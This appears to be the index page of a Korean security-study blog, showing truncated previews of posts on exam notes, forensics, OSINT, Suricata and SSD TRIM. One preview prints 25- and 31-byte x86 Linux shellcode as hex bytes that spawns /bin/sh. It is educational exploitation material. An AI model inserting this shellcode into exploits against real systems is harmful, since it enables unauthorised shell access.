전체 글

정보보안 블로그!
공부/Write-up

[DreamHack] Cookie

Link : www.notion.so/DreamHack-Cookie-5a3a2b2cb3fd4ba38c727ca96844e22b

공부/Reverse Engineering

Shellcode

0x01. 가장 기본적으로 쉘을 띄우는 코드 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80 bytes : 25 미포함 : setreuid(), exit() 0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80 bytes : 31 미포함 : setreuid() 0x03. setreuid(geteuid(), getreuid()) 까지 포함..

공부/정보보안기사

정보보안기사 - 운영체제(Process-2)

프로세스 교착상태(Deadlock) 정의 서로 다른 둘 이상의 프로세스들이 상대 프로세스가 차지하고 있는 자원을 점유하기 위해 무한 대기하는 상태 발생조건 상호배제(Mutual Exclusion) 필요한 자원에 대해 베타적 통제권을 요구하는 상태 점유와 대기(Wait) 다른 자원을 요구하지만, 자신의 자원을 해제하지 않는 상태 해결 각 프로세스가 필요한 자원을 미리 요구하여 할당 비선점 조건(Non-Preemption) 작업 완료시까지 할당된 자원을 해제 할 수 없는 상태 해결 점유 자원을 반납하고 대기상태가 되도록 조건을 부정 *조건 : 할당받은 자원은 다른 프로세스에 의해 중단될 수 없음 환형대기 조건(Circular Wait) 요청 자원에 대해 뫼비우스 띠의 형태가 된 경우\ 해결 자원에 대해 고유..

공부/Forensic

Digital Forensic / Incident Response

DF / IR ? Digital Forensic 디지털 기기를 활용한 범죄수사 정당성, 무결성, 보관성, 신속성, 재현성 Incident Response 침해사고 발생 시 대응하는 일련의 행위들 보안의 3요소 기밀성, 가용성, 무결성 침해사고에 대한 법적 근거 정보통신망 이용촉진 및 정보보호 등에 관한 법률 제 48조의 2(침해사고의 대응) 제 48조의 3(침해사고의 신고) 개인정보보호법 제 62조(침해 사실의 신고) 침해사고 대응 절차 수집 및 탐지 분석 협의 전파 및 발령 대응 및 복구 침해사고 대응 분석 절차 침해사고 분석 요청 원인분석 및 추척 이미지 분석 침투경로 추척 로그 분석 악성코드 수집 및 분석 대응 및 처리 분석결과 공유 및 사후 대책 제공 C&C 차단 악성코드 분석 정보 공유 및 차단

기타

[칼리리눅스 - Kali Linux] SMBus Host Controller not enabled 해결

initramfs 상태에서 해당 경로내 파일 들중 이름에 blacklist가 포함된 파일들을 대상으로 아래 내용 추가 blacklist i2c-piix4 그리고 저장 exit로 리부팅 만약 exit나 reboot이 되지 않는다면 fsck /dev/sda1 -y or fsck /dev/sdaX -y 실행 부팅 성공

공부/정보보안기사

정보보안기사 - 운영체제(Process-1)

1. 운영체제 1.2 운영체제의 주요 구성 기술 1.2.1 프로세스(Process) 관리 현재 실행중인 프로그램 CPU에 의해 수행되는 사용자 및 시스템 프로그램 운영체제가 관리하는 실행 단위로 실행 중인 프로그램 PCB를 가직 프로그램 PCB - 프로그램 제어 블록 1.2.2 Process Control Block PCB가 가지는 정보 프로세스의 현재 상태 고유식별자 우선순위 프로그램 위치 CPU Register 정보 포인터 정보 주기억장치 관리정보 입출력 상태정보 계정정보 1.2.3 종류 PCB 종류 1.2.4 상태 전이 세부 설명 프로세스 상태 Create - 프로세스 생성 단계 Ready - 실행을 위해 CPU 할당을 대기하는 상태 Running - CPU 할당을 받아 실제 실행되는 상태 Exit..

공부/Forensic

OSINT(오신트) - Open Source INTelligence란?

OSINT - Open Source INTelligence 공개된 자료와 정보활동의 합성어 Intelligence의 변화 14세기 15~20세기 21세기 Intelligence의 종류 HUMINT Human + Intelligence의 합성어 인간의 인간관계에 의해 획득되는 정보 특징 TECINT Tech + Intelligence의 합성어 장비를 활용한 정보활동 특징 SIGINT Signal + Intelligence의 합성어 메세지, 전자신호 등에서 획득되는 정보 특징 OSINT OpenSource + Intelligence의 합성어 공개된 정보를 활용한 정보활동 과거의 비밀첩보활동등과 다르게 공개적이고 합법적인 수단을 통해 획득된 정보 인터넷에서 비용을 들이지 않고 대량의 정보를 수집 및 분석이 가..

공부/정보보안기사

정보보안산업기사 및 기사 필기 정리- 운영체제

1. 운영체제 1.1 운영체제 개요 1.1.2 개요 시스템 소프트웨어 중 핵심 프로그램 하드웨어 및 소프트웨어의 효율적 관리를 위한 프로그램 데이터 입력하여 결과를 도출하지는 않음. but. 처리 프로그램이 실행될 수 있도록 도움 시스템 자원의 효율적인 관리와 제어가 편리하도록 사용자에게 편리한 인터페이스 제공(GUI) Ex) MS-DOS, Windows, Unix, Linux, Mac OS X 그림 1.1.2 운영체제의 목적 표 1.1.3 운영체제의 기능 주요 기능 프로그램 생성 프로그램 실행 입출력 제어 파일 시스템 관리 통신 오류검출 및 응답 자원할당 계정관리 및 보호 세부 기능 1.1.4 운영체제의 구조 계층별 분류(시스템 자원관리) 5계층으로 나뉨, 계층별 고유 기능 수행 구조 계층별 주요 기능..

공부/Network

Suricata(수리카타) - Snort의 업그레이드

Suricata란? Open Source기반의 IDS(Intrusion detection system) Snort의 업그레이드 버전 Snort와 가장 큰 차이점이라면, multi-core, mulit-threading 지원하는 것이 큰 차이 Snort rule과 완벽 호환 gpu 하드웨어 가속 지원 lua로 시그니처 작성 가능 Suricata 설치(Install Suricata) sudo apt-get install suricata Suricata 실행(Start Suricata) suricata -s rule_set(사용자 지정 룰) -i NIC(네트워크 인터페이스) ex) suricata -s test.rules -i eth0 로그 확인 tail -f /var/log/suricata/fast.log ..

공부/Forensic

SSD Trim에 따른 Garbage Collection 동작

SSD TRIM 지연처리 Property: Inprogress SSD Trim 분석보고서 ❑ 개요 SSD TRIM기능의 지연처리에 관련된 가설에 대한 실험 내용임. TRIM기능도 운영체제에서 처리해야할 작업의 일부이므로, 랜섬웨어의 경우 대량의 파일을 읽고, 수정(쓰기)해야하므로, 해당 작업도중 TRIM 작업이 추가될 경우, 작업이 지연처리되므로 해당 시간차동안 원본 데이터가 남아 있을 수 있다는 가설에 대한 실험 내용임. ❑ 실험 사양 OS : Windows 10 Edu x64 build 19042 CPU : AMD Ryzen 7 3700x SSD : Samsung SSD 860 Evo 250GB Controller : Samsung MJX Controller ❑ 실험 내용 SSD가 풀로 사용중이다가 ..

a2sembly
CALL DWORD PTR DS:[a2sembly]